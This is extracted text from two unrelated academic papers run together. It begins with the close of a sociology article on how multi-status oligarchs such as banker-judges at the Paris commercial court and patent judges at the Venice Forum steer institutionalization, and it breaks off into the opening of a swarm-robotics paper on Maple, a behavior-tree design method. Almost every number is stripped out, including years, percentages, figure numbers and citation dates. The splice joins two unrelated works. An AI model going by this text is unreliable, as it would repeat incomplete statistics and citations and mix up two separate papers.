forcing the entre- preneurs to lose all forms of status. losing out on one dimension of status (while still keeping the other dimension) is thus equivalent to rhetorical creation/purchase of much needed legitimacy. electoral poli- tics rely very often on this rhetoric of ‘loss’ of status that institutional entrepreneurs claim to accept for the general interest. ex- amples of such ‘sacrifices’ are provided in the two illustrations below. collegial oligarchy, weak culture and normative alignments the strength of these actors (their weberi- an herrschaft) is increased when they are able to join forces in what we call a colle- connections networks and institutionalization | volume | issues & | insna.org gial oligarchy. institutional entrepreneur- ship is strengthened in a regulatory college bringing together several persons with high-status inconsistency and conflicts of interests. this helps to draw a wide variety of constituencies into the process. togeth- er, multi-status oligarchs become both ver- tical and horizontal linchpins in multiple, potentially conflicting domains and levels of regulation. together they are able to ne- gotiate, select and stabilize not only the formulation of new norms, but also the conventions and interpretations of these priority norms (favereau and lazega, ). the main reason for which the creation of a collegial oligarchy is efficient in bringing together structure, culture and collective agency is that a group of hetero- geneous leaders, even fraught with initial disagreements, diverse constituencies, or antipathies, can evolve over time. years, often decades, of common and discrete collaboration create proximities, personal- ized relationships and fragile structural equilibria where mutual critique decreases over time. being in a collegial regime of personalized relationships reduces the ca- pacity to challenge others’ normative choices, to disagree. members use their personalized relationships because they fa- cilitate discussion over time – even when these are not necessarily quiet relation- ships. the important feature of this colle- gial and oligarchic closure is that it ex- cludes stakeholders that would not agree with the regulatory solutions and compro- mises hammered out as ‘weak culture’ (schultz and breiger, ). this notion suggests that one can draw new and differ- ent actors (foreigners) into this process with the right choice of words. oligarchic closure and cross-cutting networks have consequences for political participation: if you are not at the table, you are on the menu. applications and developments in neo- structural economic sociology regulation and institutionalization – ap- proached from the perspective of the strong political influence of ‘improbable’ multi-status oligarchs with high-status in- consistency and rhetorical skills – are among the processes that we have studied the most in neo-structural economic soci- ology. it has been productive to invest in this field of research because it was char- acterised by an era of ‘governance’. in this era, the command and control framework of states weakened and business was trying even harder than usual to take advantage of high-status inconsistency and conflicts of interests to build its own self-contained normative spaces where it could define the rules and the dual dimension of joint regu- lation of markets without politicians and citizens interfering with their institutional entrepreneurship. to illustrate this neo-structural ap- proach, let me present two cases of institu- tionalization of new norms in business- related judicial institutions (lazega, ), one french and one european, looking at how relational infrastructures and high- status inconsistencies are mobilized in these institutionalization processes. these are studies of how business takes ad- vantage of high-status inconsistency, con- flicts of interests and the dual dimension of joint regulation of markets, most often with strong but discreet help from public authorities . in these studies, the main in- stitutional entrepreneurs are judges who are not shy of exposing the political di- we have tried to combine these elements in a cycle of conferences called réseaux et ré- gulation that lasted years ( – ) and that was set up and organized together with lise mounier. it is not the place for a detailed description of face-to-face interviews (with sociometric questions, reconstitutions of careers, open- ended questions, vignettes, etc.) of actors involved in institutional entrepreneurship (renegotiation of new norms) and the usual difficulties of ‘studying up’. networks and institutionalization connections insna.org | issues & | volume | mension of their work. the first study looks at how the financial industry has captured a judicial institution, the com- mercial court of paris ( – ). the second study looks at the currently emerg- ing european unified patent court. both raise anew selznick’s ( ) old issues of how to design public institutions in a world of governance (to use today’s vocabulary) where an institution becomes a different thing to different people, and where each stakeholder pushes towards goal drift. promoting norms at the commercial court of paris ( – ) the commercial court of paris is a - year-old court specialized in commercial litigation and bankruptcy. it is the first- level judicial institution enforcing, creating and updating business norms. the french code de commerce was written by its president. heterogeneous, high and in- consistent dimensions of the social status of the judges in this court come from the fact that they are all business persons, of- ten successful executives or entrepreneurs, and at the same time officers of justice with the highest possible probity expected from (sworn-in) civil servants/judicial judges. the institution is truly judicial, and delivers fast, cheap, pragmatic, precedent- based justice using a special ‘practical’ procedure. judges are not just business people, but also voluntary lay judges ( % with a law degree) who are endorsed by an industry and coopted by their peers. % are retired and % are still paid by their employers or own their own company (in ). the composition of the court is characterised by an over-representation of the financial industry ( % of all judges are bankers and insurers). the building sector, another highly litigious sector, sends in % of the judges. there are many examples of how these judges do punch above their weight. one example is provided by the story of how they saved the french banking sector from bankruptcy in the s (lazega, mounier, lemaire, ). another example is the very resili- ence of this institution thanks to its built-in problem of conflicts of interests and insti- tutional capture. this court has a strong formal or- ganization, with a rule that judges rotate each year around its carrousel of cham- bers. we have used the metaphor of the spinning top to model the combination of these organized mobilities (rotation) and emergence of a pecking order in the dy- namics of the advice networks among all these judges (lazega, lemercier, mounier, ). high-status inconsistency is obvi- ous and conflicts of interests are institu- tionalized (lazega & mounier, ), as shown by the composition of the chambers in this court in , illustrated by figure . in this figure, bankers are in pink. banks are the main creditors in the economy; the very simple fact that so many bankers sit in bankruptcy chambers illustrates the level of institutional capture. connections networks and institutionalization | volume | issues & | insna.org figure : status inconsistency and conflicts of interests at the commercial court of paris: composi- tion of chambers in . judges-bankers in pink however, the domination of bankers also extends, beyond bankruptcy chambers, to epistemic domination in the other activities of this court. to show this, we measured the advice network among these judges in , and , as represented in fi- gure . an analysis of this dataset using snijders and nowicki’s ( ) stochastic blockmodelling shows that, in these net- works, bankers with a law degree are con- sistently the most central advisors for their peers. statistical analyses (mentioned above) of the dynamics of this structure confirm how this collegial oligarchy con- trols the court epistemically. bankruptcy chambers bankruptcy chamber chamber of appeal against decisions made by bankruptcy chambers networks and institutionalization connections insna.org | issues & | volume | figure : how do bankers exercise epistemic control in the court and dominate as multi-status oli- garchs? cyclical dynamics (centralization-decentralization-recentralization) of status in advice net- works among all judges red: super-central core, green: st semi-periphery, yellow: nd semi-periphery, blue: periphery wave wave wave the three figures visualize the cyclical dynamics (centralization-decentralization-recentralization) of status in the advice network among the judges in the court. core, semi-peripheries and periphery iden- tified with snijders & nowicki’s ( ) stochastic blockmodelling. source: lazega, sapulete & mou- nier ( ). connections networks and institutionalization | volume | issues & | insna.org the evolution of social and epistemic sta- tus in these cyclical dynamics is indeed characterized by the capacity of this hand- ful of members to keep their epistemic au- thority and maintain their highest centrality scores over time: they surf at the top of a wave of centralization, decentralization and recentralization of the system that was measured in this case. thus, and importantly from a neo- structural perspective focused on institu- tionalization, the multiple dimensions of status of these specific actors in this sys- tem are high, inconsistent and stable rela- tive to the cyclical dynamics of the system. this capacity creates a competitive ad- vantage in the struggle to define the priori- ty norms in the court. bankers with a law degree not only exercise epistemic control but also use this control to promote specific norms in the court. we measured normative controver- sies in the court and asked each judge to read jurisprudential cases summarizing these controversies, to use their discretion in judicial decision making, and to discuss them with us in face-to-face interviews. one of the cases concerned ‘predatory prices’ and assessment of punitive damag- es in a case of unfair competition. we found that money does talk in this institu- tionalization process: bankers were spread- ing self-serving norms of non-punitivity for such damages. snijders’ siena models (lazega, mounier, snijders and tubaro, ) of increasing super-centrality of bankers with a law degree over time helped us track the expected dynamics, ex- posing the fact that no pure normative ho- mophily was driving this spread of non- punitivity. it was rather reflexive align- ment of the majority of judges on the nor- mative choices of the super-central bankers (multi-status oligarchs) who achieved normative steering of the court by building epistemic authority thanks to their super- centrality combined with predictable rheto- rics of status sacrifice: ‘we [banks] could benefit from the current excess of punitivi- ty, but punitivity in principle is bad for the economy’. other judges aligned their nor- mative choices with those of these multi- status oligarchs. this institutionalization process is not driven by pure normative choices. it is rather driven by normative choices com- bined with specific relational infrastructur- al dynamics in two processes. firstly, by a dialectic of overload for the super-central members (who cannot answer all the re- quests for advice) and normative conflicts (lazega, sapulete and mounier, ). secondly, by the carrousel of chambers across which judges are rotated once a year, with many non-random infractions to the rule and a limited time horizon for all, including for the members in the core emerging from the movement. driven by rotation and induced by delegation and turnover in these advice networks, oscilla- tion (centralization, decentralization, re- centralization) produces a form of rewiring that signals to most judges whose norma- tive choices survive in these normative controversies. this first example confirms the capac- ity of the neo-structural theory to account for this institutionalization. our second ex- ample also involves judges punching above their weight in institution building. institutionalization of new norms for the european unified patent court this second case is about institutionaliza- tion of common norms at the emerging eu- ropean unified patent court that is meant to build a unified intellectual property (ip) regime for all european countries. it is based on the same approach as in the pre- vious example, this time with judges work- ing at the international level to build this judicial institution (scheduled to come into existence in ). it starts with a familiar pattern of eu institution building, begin- ning with the failure of european national governments to agree on common solu- tions and to concentrate enough power at the european level to impose such institu- tions (dehousse, ; thatcher, ). here institutional entrepreneurs are corpo- rate lawyers specialized in patents, repre- networks and institutionalization connections insna.org | issues & | volume | sentatives of a public/private regulator (the european patent office, epo) and activist european judges with high-status incon- sistency (civil servants openly involved in lobbying and political work). the position of these judges can also be characterized by high-status inconsistency because they openly cross the lines of division of pow- ers – thus aggrandizing their role in de- mocracy. this lobbying for the creation of a transnational court to enforce a legal in- strument, the european patent created in , was accompanied by work trying to create a common interpretation (‘harmoni- zation’) of the european patent. indeed, the normative controver- sies, both substantive and procedural, about the interpretation of this patent con- cern the assessment of the ‘inventive step’ of an invention, the determination of the scope of protection afforded by the patent, the involvement of technical experts, and the use by judges of personal rules consid- ering patents either as exceptions to the rule of copying or as rewards for the inven- tor. these disagreements led to a frag- mented normative space in european ip. an example concerning an anti-depressant drug called escitalopram is a good illustra- tion. generic supplier companies have long sought the revocation of a basic patent held by a pharmaceutical company that first synthesized this molecule. a dutch court in the hague decided on complete cancel- lation of the product and process claims for lack of an ‘inventive step’. in germany, the bundespatentgericht decision was the same. however, a decision of the french tribunal de grande instance in paris was that the product claims by the pharmaceu- tical company were valid. in the united kingdom, a first instance court decided to invalidate the product claims, but for a dif- ferent reason (namely insufficiency of dis- closure). the case is still regularly revisit- ed. this fragmentation facilitates forum shopping by multinational companies, and the emergence of ‘zombie’ patents. prodded and assembled by the cor- porate lawyers and by epo, activist euro- pean ip judges started to network and con- vene at the so-called venice forum, a field-configuring event, to lobby for the construction of this european court and work together on harmonizing their inter- pretations by hammering out a ‘european compromise’. where governments failed, a small collegial oligarchy of super-central judges emerges from these events and is poised to create the new european ip re- gime. this collegial oligarchy of judges is perceived by their peers as primi inter pares who should sit on the future court of appeal of the upc and make decisions that will create a common jurisprudence. three different networks of european judges were measured at the venice fo- rum: the network of national and foreign peers (present at the venice forum) with whom judges personally discussed patent issues; the network of national and foreign peers whose decisions they read; and the network of national and foreign peers whose decisions they had actually cited at least once in their own decisions. figures . to . identify the most central high- status inconsistency venice forum judges assembled in a ‘conclave’ , or collegial ol- igarchy that was both central in the three networks of transnational social exchanges observed among these judges at the venice forum, and in a fourth network of judges considered to be representatives of the fu- ture uniform position about patents in eu- rope (henceforth called ‘uniform net- work’). note that the reference network (respondent i cites explicitly – in his/her own decisions – decisions made by foreign judges j) is the sparsest network because explicit reference to work of foreign judges is forbidden in some countries (for exam- ple france), but it remains the main net- work in terms of influence. this word was used by lawyers and judges themselves. for example: ‘on a personal level, cohabitation – almost in a conclave – allowed us to get to know and appreciate each other (…) patent judges from the main european intellectual property countries confronted their points of view, sometimes very frankly, but always with courtesy’. connections networks and institutionalization | volume | issues & | insna.org figures . – . : the venice forum collegial oligarchy: three different networks of european judges measured at the venice forum figure . : reading network figure . : discussion network figure . : reference network networks and institutionalization connections insna.org | issues & | volume | figure . : uniform network. judges perceived by their peers as closest to a future uniform european position (the future ‘european compromise’, if any) *: super-central judges. source: lazega ( ) multi-status oligarchs, i.e. super- central uk, german, dutch judges, domi- nate this heterogeneous set of venice forum judges. losers are french, southern and central european judges. super-centrality in the uniform network is explained at % by centrality in the three other networks, by member- ship in a block of countries sharing the same kind of capitalism, and by judges’ use of experts in the legal procedure (a dis- criminant feature separating the uk from the continent at the time). analysis of the judges’ positions in the controversy com- bined with their positions in the networks shows a slightly chaotic situation: personal ties between judges across borders do not lead (automatically) to convergence and ‘harmonization’. at the time ( ), judg- es actually disagreed on several key issues with the peers that they had selected as the future representatives of the unified euro- pean position. these super-central judges at the core of the network, the future rule makers according to their peers, also did not agree with each other (yet). this analy- sis of the venice forum relational infra- structure identified the judges who later came up with the rules of procedure of the upc, a compromise based on rhetor- ical/possible ‘sacrifices’ of distinctive pro- cedural features of each big country’s na- tional ‘legal culture’: orality and adversari- al procedures by the uk; saisie- contrefaçon by france; and bifurcation by german judges. lazega, quintane and casenaz ( ) provide ergm analyses of the emergence of this uniform network and identify the costs for each of the ven- ice forum judges in terms of alignment upon the kind of judge whom they have se- lected in this uniform network. based on future ‘forced’ normative alignments, win- ners of the institutionalization process are germany and the uk, losers are southern and central europe. here again, this case confirms the capacity of the neo-structural theory of institutional entrepreneurship outlined above to account for the construc- tion of this institution. conclusion to sum up, people are not equal in their capacity to defend their regulatory inter- ests: some punch above their weight by bringing together structure and culture to shape collective agency, process by pro- cess, particularly regulatory and institu- tionalization processes in political work. connections networks and institutionalization | volume | issues & | insna.org neo-structural institutionalism (lazega, , a, ) shows how helpful it is to identify specific relational infrastruc- tures in socially organized settings to help model processes of regulation and institu- tionalisation of norms and practices. insti- tutionalization is characterised by specific social dynamics of oligarchical negotiation of ‘precarious values’ (selznick, ) and stabilization in interpretation of the rules en vigueur. in these dynamics, institutional entrepreneurs with heterogeneous and in- consistent forms of social status (measured also in network terms) can have a particu- lar influence in promoting their regulatory interests: when defining priority rules; when using a rhetoric of relative sacrifice to build legitimacy and manage the losers; when articulating and synchronizing regu- lation levels as vertical linchpins. high- status inconsistency is indeed the main characteristic of relational infrastructures mobilized in institutionalization of contro- versial norms. the added value of taking into account the real complexities of high- status inconsistencies was illustrated in two different cases. analogies between the two cases are not superficial: the same concepts (relational infrastructure, status heterogeneity and inconsistencies, conflicts of interests, multi-status oligarchs, collegi- al oligarchy, rhetorics of building legitima- cy and credibility) and measurements prove useful in accounting for institution- alization. in the neo-structural model of the regulatory process, and in politics in gen- eral, individuals do not just represent themselves. here they represent organiza- tions, professions, their country, their type of capitalism, or even legal cultures . this means that the process is necessarily a multi-level one, with superimposed forms of collective agency, justifying the scien- tific work at the level of granularity pre- legal cultures could be considered to be a level of collective agency if they are defined as dramaturgies, i.e. as involving a text, a scenario, players, roles, strategies, skills and all the ingredients of a play. sented here. for example, judges and coun- tries represent different levels. within- country relations between judges as nodes differ essentially from between-country re- lations between judges, which is distinct from between-country relations, where countries are the nodes. what is therefore needed in further exploration of this insti- tutionalization process is a combined dy- namic and multi-level perspective (snijders, , ). indeed, neo- structural institutionalism requires new and richer kinds of data structures, modelling the emergence of an institution using more powerful stochastic actor-oriented models for dynamic multi-level networks, and per- haps new measures. for example, since these dynamics are multi-level, synchroni- zation issues between levels also emerge in institutionalization. related to synchro- nization and its costs, since institutionali- zation is so oligarchical and driven by closed and collegial elites, how should the widening democratic deficit that comes at- tached to the process, and that has been criticised in the public debate over the last few years – especially in relation with the public/private dimension of such institu- tions – be questioned? such questions show that it is necessary, for a better un- derstanding of the relation between struc- ture and process, to articulate a neo- structural institutionalism (that exploits the critical potential of network analyses of dynamic multi-level systems of interde- pendences) with the political and cultural institutionalisms that prevail in sociology today. in that respect, much remains to be done. synchronization refers here to the construc- tion of intermediary-level relational infras- tructures where actors combine temporali- ties of collective action taking place above and below their intermediary-level, and try to behave in a way compatible with their own interpretations of norms coming from both upper and lower levels (lazega, c). networks and institutionalization connections insna.org | issues & | volume | references bathelt, h. & glückler, j. ( ). institutional change in economic geography. progress in human ge- ography, ( ), - . christopoulos, d. & ingold, k. ( ). exceptional or just well connected? political entrepreneurs and brokers in policy making. european political sci- ence review, ( ), - . dehousse, r. ( ). l'europe par le droit, critique internationale, , - . dimaggio, p. ( ). interest and agency in institu- tional theory. in: l. zucker (ed.), institutional pat- terns and culture. cambridge, ma: ballinger pub- lishing company, - . favereau, o. & lazega, e. (eds.) ( ). conventions and structures in economic organization: mar- kets, networks, and hierarchies. cheltenham: edward elgar publishing. glückler, j., suddaby, r. & lenz, r. (eds.) ( ). knowledge and institutions. heidelberg: springer. hall, p.a. & taylor, r. ( ). political science and the three new institutionalisms. political studies, , - . hoffman, a. j. ( ). institutional evolution and change: environmentalism and the us chemical industry. academy of management journal, , - . huault, i. & richard, ch. (eds.) ( ). finance: the discreet regulator. how financial activities shape and transform the world, london: pal- grave-macmillan. hughes, e. c. ( ). dilemmas and contradictions of status. american journal of sociology, , - . lahille e. ( ). le politique dans la théorie de la régulation: bilan et perspective, colloque la théorie de la régulation à l’épreuve des crises, paris, - juin , université paris-diderot- inalco. lawrence, t. b., suddaby, r. & leca, b. ( ). in- stitutional work: refocusing institutional studies of organization, journal of management inquiry ( ): - . lazega, e. ( ). the collegial phenomenon, ox- ford: oxford university press. lazega, e. ( ). networks in legal organizations: on the protection of public interest in joint regula- tion of markets, oratie for wiarda chair, wiarda institute publications, faculty of law, utrecht university. lazega, e. ( ). capital social, processus sociaux et capacité d’action collective, in a.bevort and m.lallement (eds.), capital social: echanges, ré- ciprocité, équité, paris, la découverte, - . lazega, e. ( a). sociologie néo-structurale. in: r.keucheyan et g.bronner (eds.), introduction à la théorie sociale contemporaine. paris: presses universitaires de france. lazega, e. ( b). time to shrink to greatness? networks and conflicts of interests in large pro- fessional firms, revue für postheroisches man- agement, , - . lazega, e. ( c). learning from lobbying: mapping judicial dialogue across national borders among european intellectual property judges. utrecht law review, http://www.utrechtlawreview.org, ( ) (may) . lazega, e. ( a). réseaux et régulation: pour un in- stitutionnalisme néo-structural, revue de la régu- lation : capitalisme, institutions, pouvoirs, https://regulation.revues.org/ #text lazega, e. ( b). joint ‘anormative’ regulation from status inconsistency: a multilevel spinning top model of specialized institutionalization, in margaret s. archer (ed.), anormative regulation in the morphogenic society, springer, - , lazega, e. ( c). synchronization costs in the or- ganizational society: intermediary relational infra- structures in the dynamics of multilevel networks, in e.lazega and t.a.b. snijders (eds.), multilevel network analysis for the social sciences, spring- er, - . lazega, e., mounier, l. & lemaire, s. ( ). finan- cial pragmatism and bankers’ politics: the duality of the “zombies” debate in bankruptcy proceed- ings at the commercial court of paris ( - ). in: v.boussart (ed.), finance at work, london: routledge. lazega, e. & mounier, l. ( ). networks of institu- tional capture. in: b.vedres & m.scotti (eds.), networks in social policy problems. cambridge: cambridge university press, - . lazega, e., lemercier, c. & mounier l. ( ). a spinning top model of formal structure and infor- mal behaviour: dynamics of advice networks in a commercial court. european management review, , - . lazega, e., sapulete, s. & mounier, l. ( ). struc- tural stability regardless of membership turnover? the added value of blockmodelling in the analysis of network evolution. quality & quantity, , - . lazega, e., mounier, l., snijders, t.a.b. & tubaro, p. ( ). norms, status and the dynamics of ad- vice networks. social networks, , - . lazega, e., quintane, e. & casenaz, s. ( ). colle- gial oligarchy and networks of normative alignments in transnational institution building: the case of the european unified patent court. social networks, , - . lenski, g. e. ( ). status crystallization: a non- vertical dimension of social status. american soci- ological review, ( ), - . owen-smith, j. & powell, w.w. ( ). networks and institutions, in greenwood, r., oliver, c., sahlin-andersson, k. & suddaby, r. (eds.). the sage handbook of organizational institutional- ism, - , london: sage. connections networks and institutionalization | volume | issues & | insna.org perrow, ch. ( ). a society of organizations. theo- ry and society, , - . scott, w. r. ( ). institutions and organizations. thousand oaks: sage. schultz, j. & breiger, r. l. ( ). the strength of weak culture. poetics, ( ), - . selznick, p. ( ). tva and the grass roots: a study in the sociology of formal organization, , berke- ley: university of california press. selznick, ph. ( ). leadership in administration. evanston, ill.: row, peterson & co. snijders, t. a., & nowicki, k. ( ). estimation and prediction for stochastic blockmodels for graphs with latent block structure. journal of classifica- tion, ( ), - . snijders, t.a.b. ( ). the multiple flavours of mul- tilevel issues for networks, in lazega, e. and snijders, t.a.b. (eds.), multilevel network analy- sis for the social sciences. springer international publishing, - . snijders, t.a.b. ( ). stochastic actor-oriented models for network dynamics. annual review of statistics and its application, , - . thatcher, m. ( ). analysing regulatory reform in europe. journal of european public policy, ( ), - . automatic modular design of robot swarms using behavior trees as a control architecture automatic modular design of robot swarms using behavior trees as a control architecture antoine ligot ,*, jonas kuckling ,*, darko bozhinoski , and mauro birattari iridia, université libre de bruxelles, brussels, belgium cognitive robotics, delft university of technology, delft, netherlands * these authors contributed equally to this work. abstract we investigate the possibilities, challenges, and limitations that arise from the use of behavior trees in the context of the automatic modular design of collective behaviors in swarm robotics. to do so, we introduce maple, an automatic design method that combines predefined modules—low-level behaviors and conditions— into a behavior tree that encodes the individual behavior of each robot of the swarm. we present three empirical studies based on two missions: aggregation and foraging. to explore the strengths and weaknesses of adopting behavior trees as a control architecture, we compare maple with chocolate, a previously proposed automatic design method that uses probabilistic finite state machines instead. in the first study, we assess maple’s ability to produce control software that crosses the reality gap satisfactorily. in the second study, we investigate maple’s performance as a function of the design budget, that is, the maximum number of simulation runs that the design process is allowed to perform. in the third study, we explore a number of possible variants of maple that differ in the constraints imposed on the structure of the behavior trees generated. the results of the three studies indicate that, in the context of swarm robotics, behavior trees might be appealing but in many settings do not produce better solutions than finite state machines. subjects adaptive and self-organizing systems, agents and multi-agent systems, artificial intelligence, computer aided design, robotics keywords swarm robotics, automatic design, behavior trees, finite state machines, evolutionary robotics, automode, optimisation-based design introduction in this article, we extend the original definition of automode—the family of automatic modular design methods proposed by francesca et al. ( )—to study the use of behavior trees as a control software architecture for robot swarms. in swarm robotics, a large group of autonomous robots cooperate to perform a mission that is beyond the limited capabilities of a single robot (beni, ; Şahin, ; brambilla et al., ; garattoni & birattari, ). a robot swarm is highly redundant, self-organized, and decentralized in nature. these properties are appealing in applications that, for example, imply a high risk of individual failure, take place in locations with limited communication infrastructure, or require scalability (dorigo, birattari & brambilla, ). how to cite this article ligot a, kuckling j, bozhinoski d, birattari m. . automatic modular design of robot swarms using behavior trees as a control architecture. peerj comput. sci. :e doi . /peerj-cs. submitted june accepted october published november corresponding authors antoine ligot, aligot@ulb.ac.be mauro birattari, mbiro@ulb.ac.be academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright ligot et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:aligot@�ulb.�ac.�be mailto:mbiro@�ulb.�ac.�be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ unfortunately, these properties have also a downside: it is difficult to conceive and implement control software for the individual robots so that a desired collective behavior is produced. as a general methodology is still missing, the design process is typically labor intensive, time consuming, error prone, and difficult to reproduce (brambilla et al., ; francesca & birattari, ; bozhinoski & birattari, ). automatic design is a valid and promising alternative (francesca & birattari, ; birattari et al., ). in automatic design, the problem of designing control software to perform a given mission is re-formulated into an optimization problem: an optimization algorithm searches a space of candidate solutions so as to maximize an objective function. in this context, a candidate solution is an instance of the control software to be executed by each robot; and the objective function is a mission-dependent score that measures the performance of the swarm on the given mission. because the evaluation of candidate solutions on physical robots is costly and time consuming, automatic design methods typically rely on simulation. a major issue with the adoption of simulation in automatic design is the so called reality gap (brooks, ; jakobi, husbands & harvey, ): the difference between simulation and reality, which is ultimately unavoidable. as a result of the reality gap, it is possible, and even likely, that control software generated in simulation suffers from a drop in performance when deployed in reality. the reality gap is one of the most challenging issues in the automatic design of robot swarms (francesca & birattari, ). evolutionary swarm robotics (trianni, , )—the application of evolutionary robotics (lipson, ; floreano, husbands & nolfi, ) to robot swarms—is a popular automatic design approach. in evolutionary swarm robotics, an evolutionary algorithm (bäck, fogel & michalewicz, ) generates the control software of the robots, typically in the form of an artificial neural network. the input of the artificial neural network are the sensor readings; the output are the control actions that drive the actuators. although evolutionary swarm robotics has been successfully used to generate control software for various missions (quinn et al., ; christensen & dorigo, ; hauert, zufferey & floreano, ; trianni & nolfi, ), it presents some known limitations, among which is its inability to cross the reality gap reliably (silva et al., ). francesca et al. ( ) conjectured that the issues encountered by evolutionary robotics with the reality gap are due to the high representational power of artificial neural networks. this leads the design process to overfit characteristics of the simulator that do not have a counterpart in reality. as a result, the control software produced fails to generalize to the real world. inspired by the notion of bias–variance tradeoff (geman, bienenstock & doursat, ) from the supervised learning literature, francesca et al. ( ) developed automode: an automatic design approach in which control software is conceived by automatically assembling predefined modules (that is, low-level behaviors and conditions) into a modular software architecture. the rationale behind automode is to lower the representational power—and therefore the variance—of the control software it produces by introducing bias: it is restricted to be combinations of predefined modules. this restriction restrains the space of the possible instances of control software that can be for the sake of completeness, we men- tion here that some automatic design methods do not rely on simulation. they operate while robots are deployed in their operating environment. we refer the reader to francesca & birattari ( ) for a discussion of advantages and limitations of these methods. ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ generated by automode, with the intent of reducing the risk to overfit characteristics of the simulator that are not a faithful representation of reality. automode is an abstract approach that, in order to be used, must be specialized to a specific robotic platform by defining low-level behaviors and conditions, the specific rules/constraints to combine them, and the optimization algorithm to search the space of solutions. so far, all instances of automode—that is, vanilla (francesca et al., ), chocolate (francesca et al., ), gianduja (hasselmann, robert & birattari, ), waffle (salman, ligot & birattari, ), coconut (spaey et al., ), icepop (kuckling, ubeda arriaza & birattari, ), and tuttifrutti (garzón ramos & birattari, )— that have been proposed target the e-puck robot (mondada et al., ). to substantiate their conjecture, francesca et al. ( ) compared the performance of vanilla and chocolate with evostick, an implementation of the classical evolutionary swarm robotics approach. in their experiments, francesca et al. ( , ) observed that both vanilla and chocolate are able to generate control software that crosses the reality gap satisfactorily. in addition, they observed what can be called a rank inversion (ligot & birattari, , ): evostick outperforms vanilla and chocolate in simulation, but vanilla and chocolate outperform evostick in reality. in the original definition, francesca et al. ( ) have characterized automode as an approach to generate control software in the form of a probabilistic finite-state machine (francesca et al., , ). however, this characterization appears to be too restrictive: the element that truly characterize automode—whose name is the contraction of automatic modular design—is that it generates control software by combining and fine-tuning predefined modules. indeed, according to the conjecture of francesca et al. ( ), its modular nature is the main reason why automode has shown to be robust to the reality gap: the architecture into which the modules are assembled appears to be a secondary issue. in this article, we aim at investigating the possibilities, challenges, and limitations that arise from the use of behavior trees in the context of the automatic modular design of collective behaviors in swarm robotics. behavior trees are a popular control architecture originally proposed for game development (champandard, ; champandard, dawe & hernandez-cerpa, ), and offer a number of advantages over finite-state machines, such as enhanced expressiveness, inherent modularity, and two-way control transfers (colledanchise & Ögren, ). moreover, colledanchise & Ögren ( ) have shown that behavior trees generalize a number of other architectures including the subsumption architecture (brooks, ) and decision trees (nehaniv & dautenhahn, ). recently, behavior trees have attracted interest from the domains of artificial intelligence and robotics (colledanchise & Ögren, ). the main characteristics of behavior trees is the use of complex behavioral modules as leaf nodes that return their state of execution: running, success, or failure. behavior trees are therefore a convenient way to implicitly model plans of execution: they define what action needs to be taken if a given condition is met or not, and if a given behavior succeeds or fails. the current practice of swarm robotics goes against the principle of planning as the individual robots used are typically simple and reactive in the sense defined by ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ brooks ( ). in the reactive paradigm, a low-level behavior is executed indefinitely until an external event triggers the indefinite execution of another low-level behaviors, and so on. due to this cultural legacy, the low-level behaviors typically operated by robots within swarms do not have natural termination criteria, and therefore do not have success/failure states. in addition, the hardware limitations of the simple individual robots typically used in swarm robotics does not give them the capabilities of assessing natural termination criteria of the low-level behaviors they are executing. it is nonetheless possible to use behavior trees as a control software architecture for robot swarms, as it has already been done by jones et al. ( ). however, to do so, design choices are needed and possibly only a subset of the functionalities of the behavior trees can be used, which forces one to renounce the implicit planning that they offer. for example, jones et al. ( ) considered atomic commands as action nodes (i.e., move forward, turn left/right, or store data) that always return success after the second execution of the behavior, and never return failure. despite not benefiting from the full potential of behaviors trees when combining low-level behaviors without natural termination criteria, it remains that the inherent modularity that they offer makes behavior trees a control architecture that is well worth exploring in the context of automatic design of robot swarm. indeed, because each subtree is a valid structure, behavior trees are more easily manipulated than finite-state machines (colledanchise & Ögren, ). therefore, one could conceive tailored optimization algorithms based on local manipulations that explore the possible collective behaviors obtained by selecting, combining, and fine-tuning predefined modules into behavior trees more efficiently than into finite state machines. in this work, we study the use of behavior trees in fully automatic off-line design of robot swarms (birattari, ligot & hasselmann, ). we do so by developing a method that uses low-level behaviors that are more complex than those of jones et al. ( ), but yet less complex than those typically used in applications of behaviors tree to other domains. indeed, rather than using atomic commands and assuming the artificial return of success after a given time, we use low-level behaviors as they are typically conceived in swarm robotics, that is, without the notion of success or failure. we devised maple, a novel instance of automode that has at its disposal the same low-level behaviors and conditions used by vanilla and chocolate, with the goal of understanding the conditions under which it is beneficial to adopt behavior trees over finite state machines in modular automatic design. maple is in many aspects similar to chocolate: in fact, we only substituted probabilistic finite state machines with behavior trees. this way, differences in performance between the two methods can only be attributed to the different control architecture they adopt. because the behavioral modules adopted in maple only return running, maple produces control software in the form of behavior trees with predetermined structure that only use a subset of the behavior trees functionalities. in this structure, a conditional module is combined with a low-level behavior in order to act as a termination criterion for the said low-level behavior. we present three empirical studies conducted on two missions. in the first one, we study the robustness of automatically generated control software in the form of behavior trees by comparing its performance in simulation and in reality. the results show that the control software generated by maple ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performs similarly to the one generated by chocolate, and that it crosses the reality gap more satisfactorily than the one generated by evostick. this confirms francesca et al.’s ( ) conjecture that automode is robust to the reality gap due to its modular nature. in the second study, we investigate the impact of different design budgets on the performance of the control software produced by maple and chocolate. the results indicate that maple converges to satisfactory solutions faster than chocolate. however, it appears that the expressiveness of the control structure adopted in maple is reduced with regard to the one of finite state machines: maple cannot produce solutions as complex as those produced by chocolate for one of the missions considered. in the third study, we explore multiple alternatives to the structure of the behavior trees adopted in maple. all these alternatives are predefined, restricted behavior trees structures that can be used with low-level behaviors that do not have a natural termination criterion. the results show that none of the explored structures outperform the one adopted in maple in both missions considered. this paper extends on preliminary results presented in a conference (kuckling et al., a). we present here the complete description of the automatic design method and justifications of the design choices, together with more experimental results. the work of jones et al. ( ) brought initial evidence that behavior trees are a viable control architecture to be adopted in swarm robotics when considering atomic commands as action nodes. our studies highlight the strengths and weaknesses of behavior trees when applied low-level behaviors as they are typically conceived in this domain: our results suggest that, although behavior trees might be appealing under some settings, under other they do not produce better results than finite state machines and might be even outperformed by the latter. what hinders 